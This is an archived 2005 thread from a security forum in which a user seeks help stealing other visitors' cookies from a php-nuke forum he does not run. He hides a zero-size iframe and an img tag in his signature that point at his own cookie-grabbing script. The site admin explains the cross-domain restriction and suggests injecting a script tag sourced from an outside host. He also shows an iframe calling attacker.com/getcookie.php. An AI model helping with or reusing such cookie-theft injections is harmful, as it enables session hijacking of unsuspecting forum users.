Waraxe IT Security Portal
Login or Register
June 17, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 52
Members: 0
Total: 52
Full disclosure
SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED - MEDICAL OFFICE (Medical practice management) Demo version
Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Defense in depth -- the Microsoft way (part 89): user grouppolicies don't deserve tamper protection
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0
ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page
ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path
Local information disclosure in apport and systemd-coredump
Stored XSS via File Upload - adaptcmsv3.0.3
IDOR "Change Password" Functionality - adaptcmsv3.0.3
Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
Authenticated File Upload to RCE - adaptcmsv3.0.3
Stored XSS in "Description" Functionality - cubecartv6.5.9
Multiple Vulnerabilities in SAP GuiXT Scripting
CVE-2024-47081: Netrc credential leak in PSF requests library
Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> problem in stealing cookies with iframe - please help!
Post new topicReply to topic View previous topic :: View next topic
problem in stealing cookies with iframe - please help!
PostPosted: Wed Jul 13, 2005 11:56 am Reply with quote
eli5050
Beginner
Beginner
Joined: Jul 13, 2005
Posts: 4




I built a script that takes all the cookies and saves them, and I hosted that script on my server.
here is the code:

edit: I deleted the code because it is not important to the answer



now, I entered some PHPIB forum (with php-nuke), and I found that html can be written in the signature, so I made an Iframe (0*0 Very Happy ) in my forum signature to the evil script. (by the way - javascript code is not working in the signature)

the problem is, that when the script ran he did not take the phpnuke with phpib site cookies, but it stole cookies from my server (beacause the script hosted in it).

can anyone help and find a solution that will solve the problem and make the script take the cookies from the site with the iframe and not from my site??


Last edited by eli5050 on Wed Jul 13, 2005 5:50 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Wed Jul 13, 2005 12:34 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This is result of webbrowser security measures against cross-site and/or cross-domain scripting.
If you have iframe inside some webpage, then IF that iframe is hosted on other domain - you cant access parent page html code and other stuff, like cookies.
But if you can inject to target page html code something like this:

<script type=text/javascript src=xxx.com></script>

... then this javasript can do anything you want and browser will not apply any restrictions.
View user's profile Send private message Send e-mail Visit poster's website
thanks!
PostPosted: Wed Jul 13, 2005 12:41 pm Reply with quote
eli5050
Beginner
Beginner
Joined: Jul 13, 2005
Posts: 4




but the script code is in php, do you think it will work?
View user's profile Send private message
PostPosted: Wed Jul 13, 2005 12:46 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




As i can understand, you have something like:

Code:

<html>
<body>
...
....

<iframe src=http://attacker.com/getcookie.php></iframe>
...
...
</body>
</html>


All the stuff inside that iframe will be restricted by cross-domain security barriers.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 13, 2005 1:31 pm Reply with quote
eli5050
Beginner
Beginner
Joined: Jul 13, 2005
Posts: 4




I already told you I cant use scripts in my signature, if I write <script> then users see it as usual word and it is not with code. so I tried the following thing, instead "script I tried "img":

Code:
<img width = "0" height = "0" type="text/javascript" src="http://mysite/1.php"/>


and when I entered to a message that I wrote, my signature ran the script - but...

the cookie that was sent was from the server that stores the script and not the server I want...

where did I wrong?
could you please tell me or find some othe way to run the script?
View user's profile Send private message
problem in stealing cookies with iframe - please help!
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.027 Seconds